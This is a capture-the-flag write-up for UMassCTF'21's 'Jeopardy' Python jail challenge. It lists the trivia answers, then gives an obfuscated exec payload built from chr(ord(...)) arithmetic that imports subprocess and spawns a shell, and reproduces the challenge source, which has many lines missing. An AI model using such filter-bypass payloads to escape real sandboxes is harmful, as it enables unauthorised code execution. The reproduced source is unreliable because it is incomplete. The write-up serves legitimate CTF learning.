UMassCTF'21: Jeopardy


Category: misc

477 points

This is Jail-pardy!

nc 8082

nc 8082

There has been confusion over Miscellaneous 200. The answer is “ios”, it is misleading. My bad. Good luck and enjoy! :)

Created by Thomas (Seltzerz #6678)

Hint: For the 10000 point challenge, it’s in the first 30 minutes :)


This challenge is a form of quiz + jail escape. For every correct answer we’re given one or more characters, which can be used in further python jailbreak.

Welcome to python jail-pardy! Each correctly answered question grants you characters which you can use try to break out 
of this game with to get the flag.
When you answer a question correctly, the game will tell you which characters have been unlocked.
To attempt to breakout, instead of picking a question, type the word "jailbreak" instead.

    ----------------------------------------- Jeopardy! -----------------------------------------
    UMass:  Cybersecurity Now:  Cybersecurity Yesterday:  Cybersecurity Tomorrow:  Miscellaneous:
     100           100                     100                      100                 100
     200           200                     200                      200                 200
     300           300                     300                      300                 300
     400           400                     400                      400                 400
     500           500                     500                      500                 10000

Type "ready" when you are ready to play!
Pick a category and dollar amount in the format of "category dollar amount" with no dollar sign from the board below
or type "jailbreak" to attempt to breakout of the game.

    ----------------------------------------- Jeopardy! -----------------------------------------
    UMass:  Cybersecurity Now:  Cybersecurity Yesterday:  Cybersecurity Tomorrow:  Miscellaneous:
     100           100                     100                      100                 100
     200           200                     200                      200                 200
     300           300                     300                      300                 300
     400           400                     400                      400                 400
     500           500                     500                      500                 10000

We (as an Inner Savages team) spent literally hours on seeking the answers.

Eventually we ended with below set:

                        100 - Sam
                        200 - Food
                        300 - Franklin
                        400 - Orchard Hill Area
Cybersecurity Now
                        100 - 39
                        200 - laser
                        300 - Radiohead
                        400 - Microsoft
                        500 - dog
Cybersecurity Yesterday
                        100 - captain crunch
                        200 - Wargames
                        300 - Iran
                        400 - The Reaper
CyberSecurity Tommorow
                        100 - Quantum
                        200 - 2038
                        400 - arm
                        500 - deepfake
                        100 - TryHackMe
                        200 - ios
                        300 - 101010
                        400 - 4
                        10000 - gSH1GgcJHimHy0XaMn

Those answers gave me enough characters to attempt the jailbreak.

Input whatever you wish to try to break out of this game with in the following input.
Here are the characters you are allowed to use: ' ', '%', "'", '(', ')', '+', ',', '.', '1', ':', '<', ']', '_', '`', 'a
', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'm', 'n', 'o', 'p', 'q', 'r', 'w', 'x', 'y', 'z', '{', '}', '~'

I’ve decided to execute below code

exec("import subprocess;['sh'])")

But, to do so I needed to get rid of the not allowed characters from payload. Main disadvantages were missing t and s letters. I’ve substituted them with chr(ord('r')+1+1) and chr(ord('r')+1) accordingly. Few others characters also were missing, I’ve used the same approach to them. Finally, I’ve successfully escaped using below payload:

exec('impor' + chr(ord('r')+1+1) + ' ' + chr(ord('r')+1) + chr(ord('r')+1+1+1) + 'bproce' + chr(ord('r')+1) + chr(ord('r
')+1) + chr(ord(':')+1) + ' ' + chr(ord('r')+1) + chr(ord('r')+1+1+1) + 'bproce' + chr(ord('r')+1) + chr(ord('r')+1) + '
.ca' + chr(ord('i')+1+1+1) + chr(ord('i')+1+1+1) + '(' + chr(ord('<')+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+
1+1+1+1+1+1) + chr(ord('%')+1+1) + chr(ord('r')+1) + 'h' + chr(ord('%')+1+1) + '])')

Got shell and found flag…

Input whatever you wish to try to break out of this game with in the following input.
Here are the characters you are allowed to use: ' ', '%', "'", '(', ')', '+', ',', '.', '1', ':', '<', ']', '_', '`', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'm', 'n', 'o', 'p', 'q', 'r', 'w', 'x', 'y', 'z', '{', '}', '~'
>>> exec('impor' + chr(ord('r')+1+1) + ' ' + chr(ord('r')+1) + chr(ord('r')+1+1+1) + 'bproce' + chr(ord('r')+1) + chr(ord('r')+1) + chr(ord(':')+1) + ' ' + chr(ord('r')+1) + chr(ord('r')+1+1+1) + 'bproce' + chr(ord('r')+1) + chr(ord('r')+1) + '.ca' + chr(ord('i')+1+1+1) + chr(ord('i')+1+1+1) + '(' + chr(ord('<')+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1) + chr(ord('%')+1+1) + chr(ord('r')+1) + 'h' + chr(ord('%')+1+1) + '])')
cat flag.txt

Aa a bonus I’ve captured the challenge python code to see all the correct answers.

import sys
import time
import os

def jailbreakattempt(allowedchars):
    print('Input whatever you wish to try to break out of this game with in the following input.')
    print('Here are the characters you are allowed to use: {}'.format(str(sorted(allowedchars))[1:-1]))
    text = input('>>> ')
    for char in text:
        # print(char)
        # print(allowedchars)
        if char not in allowedchars:
            print('You entered a character you are not allowed to use. Go answer more questions or rerun the game.')
        print('Your input threw an exception. Try something different.')

def displaygb(gameboardboolean):
    gbheader = """
    ----------------------------------------- Jeopardy! -----------------------------------------
    UMass:  Cybersecurity Now:  Cybersecurity Yesterday:  Cybersecurity Tomorrow:  Miscellaneous:
    gbqs = [
        ['', '', '', '', ''],
        ['', '', '', '', ''],
        ['', '', '', '', ''],
        ['', '', '', '', ''],
        ['', '', '', '', '']

    gbqsprinted = ""

    for i in range(5):
        for j in range(5):
            if j == 0 and i == 0:
                gbqsprinted += " "
            elif j == 0:
                gbqsprinted += "     "
            elif j == 1:
                gbqsprinted += "           "
            elif j == 2:
                gbqsprinted += "                     "
            elif j == 3:
                gbqsprinted += "                      "
            elif j == 4:
                gbqsprinted += "                 "
            if gameboardboolean[i][j]['answered'] is False:
                gbqs[i][j] = gameboardboolean[i][j]['points']
                gbqsprinted += str(gameboardboolean[i][j]['points'])
                gbqsprinted += "   "
        gbqsprinted += '\n'

    print(gbheader + gbqsprinted)

def main():
    allowedchars = [' ']

    # allowedchars = [chr(i) for i in range(128)]

    a1 = {'chars': ['('], 'points': 100, 'question': 'What is the name of the mascot of UMass?',
          'answer': ['sam', 'sam the minuteman'],
          'answered': False}
    a2 = {'chars': ['{'], 'points': 200, 'question': 'What is UMass most famously known for being #1 for?',
          'answer': ['dining', 'food', 'dining program'], 'answered': False}
    a3 = {'chars': ['}'], 'points': 300,
          'question': 'What dining hall is hard-serve ice cream served at on campus everyday?',
          'answer': ['frank', 'franklin', 'franklin dining commons'], 'answered': False}
    a4 = {'chars': ['x'], 'points': 400, 'question': 'Where was the old honors college located?',
          'answer': ['orchard hill', 'ohill', 'orchard hill area', 'orchard hill residential area'], 'answered': False}
    a5 = {'chars': ['s', 't', 'u', 'v'], 'points': 500,
          'question': 'This flag was raised from a dorm in the central housing area in the 90s due to unrest from the residents',
          'answer': ['jolly roger', 'jolly roger flag'], 'answered': False}

    b1 = {'chars': [':'], 'points': 100,
          'question': 'According to UMaryland Professor, a hacker attacks computers on average every ___ seconds?',
          'answer': ['39'], 'answered': False}
    b2 = {'chars': [')'], 'points': 200,
          'question': 'University of Michigan researchers controlled a Google Home from 230 feet away with what?',
          'answer': ['laser', 'lasers'], 'answered': False}
    b3 = {'chars': ['+'], 'points': 300,
          'question': 'Band that was recently threatened to have unreleased music released unless they pay the hackers money',
          'answer': ['radiohead', 'radio head'], 'answered': False}
    b4 = {'chars': ['_', '<'], 'points': 400,
          'question': 'This company recently had their source code accessed in a huge breach',
          'answer': ['microsoft', 'windows'], 'answered': False}
    b5 = {'chars': ['p', 'q'], 'points': 500,
          'question': 'What is a fairly new way to find electronics that law enforcement are using, i.e. Subway scandal',
          'answer': ['electronic sniffing dog', 'electronic sniffing dogs', 'dogs', 'dog'], 'answered': False}

    c1 = {'chars': ['%'], 'points': 100, 'question': 'Nickname of one of the first "hackers" that is a cereal brand',
          'answer': ['captain crunch'], 'answered': False}
    c2 = {'chars': ['1'], 'points': 200, 'question': 'Movie where tic-tac-toe used to save the world?',
          'answer': ['wargames', 'war games'], 'answered': False}
    c3 = {'chars': ['c'], 'points': 300,
          'question': 'Country that US and Israeli has made multiple worms and malware against?',
          'answer': ['iran'], 'answered': False}
    c4 = {'chars': ['.'], 'points': 400,
          'question': 'The first real use of cybersecurity against a virus was a program called the ___?',
          'answer': ['the reaper', 'reaper'], 'answered': False}
    c5 = {'chars': ['j', 'k', 'l'], 'points': 500, 'question': 'DoD wrote this during the cold war',
          'answer': ['orange book', 'the orange book'], 'answered': False}

    d1 = {'chars': ["'"], 'points': 100,
          'question': 'This type of computing that has much promise for the future poses a great threat to encryption schemes commonly used today',
          'answer': ['quantum', 'quantum computing'], 'answered': False}
    d2 = {'chars': ['e'], 'points': 200, 'question': 'This year will be the next y2k thanks to some data types',
          'answer': ['2038', 'year 2038'], 'answered': False}
    d3 = {'chars': ['['], 'points': 300,
          'question': 'Said to be the number 1 risk or threat in cybersecurity for the foreseeable future',
          'answer': ['human nature', 'humans', 'people', 'human'], 'answered': False}
    d4 = {'chars': [']'], 'points': 400,
          'question': 'This architecture of CPUs seems to have many benefits but has repeatedly had vulnerabilities found in it after major releases of them',
          'answer': ['arm', 'arm processors'], 'answered': False}
    d5 = {'chars': ['m', 'n', 'o'], 'points': 500,
          'question': 'This technology that can be used to create fake events with real images is a serious concern for future cybersecurity',
          'answer': ['deepfake', 'deepfakes'], 'answered': False}

    e1 = {'chars': ['`'], 'points': 100, 'question': 'Name a sponsor of UMassCTF',
          'answer': ['google cloud', 'google dsc', 'hackthebox', 'akamai', 'tryhackme'], 'answered': False}
    e2 = {'chars': ['r'], 'points': 200, 'question': 'This was the most popular OS that was used in 2020',
          'answer': ['ios'], 'answered': False}
    e3 = {'chars': ['h'], 'points': 300,
          'question': 'The answer to the life, universe, everything? In binary, of course.', 'answer': ['101010'],
          'answered': False}
    e4 = {'chars': [',', '~'], 'points': 400,
          'question': 'If there are 6 apples and you take away 4, how many do you have?', 'answer': ['4'],
          'answered': False}
    e5 = {'chars': ['a', 'b', 'd', 'f', 'g', 'i', 'w', 'y', 'z'], 'points': 10000,
          'question': 'The UMass Cybersecurity club holds many talks from a wide variety of industry '
                      'professionals in the tech scene. One such company may have leaked a password to '
                      'something they were demoing during their presentation but did not care. What was'
                      ' the password displayed on the screen?', 'answer': ['gsh1ggcjhimhy0xamn'], 'answered': False}

    gameboardboolean = [
        [a1, b1, c1, d1, e1],
        [a2, b2, c2, d2, e2],
        [a3, b3, c3, d3, e3],
        [a4, b4, c4, d4, e4],
        [a5, b5, c5, d5, e5]


    print('Type "ready" when you are ready to play!')
    userready = input()
    if userready != 'ready':
        print('Terminating program.')

    totalquestions = 25
    exitprogram = 0
    while totalquestions >= 1:
                '\nPick a category and dollar amount in the format of "category dollar amount" with no dollar sign from the board below')
            print('or type "jailbreak" to attempt to breakout of the game.')
            questionpick = input().lower()
            if questionpick == 'exit':
                print('Terminating program now')
                exitprogram = 1
            if questionpick == 'jailbreak':
                print("\nYou are back in the game loop. I hope it wasn't too easy...")
            if len(questionpick.split(" ")) < 2 or not questionpick.split(" ")[-1].isdigit():
                print('Please provide a category and dollar amount')
            category = ""
            for i in questionpick.split(" ")[0:-1]:
                category += i + " "
            category = category[0:-1]
            dollaramount = questionpick.split(" ")[-1]
            if int(dollaramount) != 100 and int(dollaramount) != 200 and int(dollaramount) != 300 and int(
                    dollaramount) != 400 and int(dollaramount) != 500 and int(dollaramount) != 10000:
                print('Provide a valid dollar amount')
            arrayrow = int((int(questionpick.split(" ")[-1]) / 100) - 1)
            if category == 'umass':
                currentquestion = gameboardboolean[arrayrow][0]
            elif category == 'cybersecurity now':
                currentquestion = gameboardboolean[arrayrow][1]
            elif category == 'cybersecurity yesterday':
                currentquestion = gameboardboolean[arrayrow][2]
            elif category == 'cybersecurity tomorrow':
                currentquestion = gameboardboolean[arrayrow][3]
            elif category == 'miscellaneous':
                if questionpick.split(" ")[-1] == '10000':
                    currentquestion = gameboardboolean[4][4]
                    currentquestion = gameboardboolean[arrayrow][4]
                print('Not a valid category.')

            if currentquestion['answered'] is True:
                print('That question has already been answered.')
                print('Your answer:')
                useranswer = input()
                currentquestion['answered'] = True
                if str(useranswer).lower() in currentquestion['answer']:
                    print('Correct! You have been awarded the following characters: {}'.format(
                    for i in currentquestion['chars']:
                    print('No, sorry. If you wish to try again you will have to restart the game entirely.')
                totalquestions -= 1
            print("An error occurred. Play the game as it was meant to be played, please :)")

    if exitprogram != 1:
            'You have now attempted to answer all the questions. You can either exit this game by typing "exit" or continually attempt to jailbreak.')
        while True:
                finished = input()
                if finished == 'jailbreak':
                elif finished == 'exit':
                    print('Exiting now')
                    print('Invalid argument passed. Either type "jailbreak" or restart the game.')
                print('An error has occurred. Play the game it was meant to be played, please :)')

if __name__ == '__main__':
        'Welcome to python jail-pardy! Each correctly answered question grants you characters which you can use try to break out of this game with to get the flag.')
    print('When you answer a question correctly, the game will tell you which characters have been unlocked.')
    print('To attempt to breakout, instead of picking a question, type the word "jailbreak" instead.')



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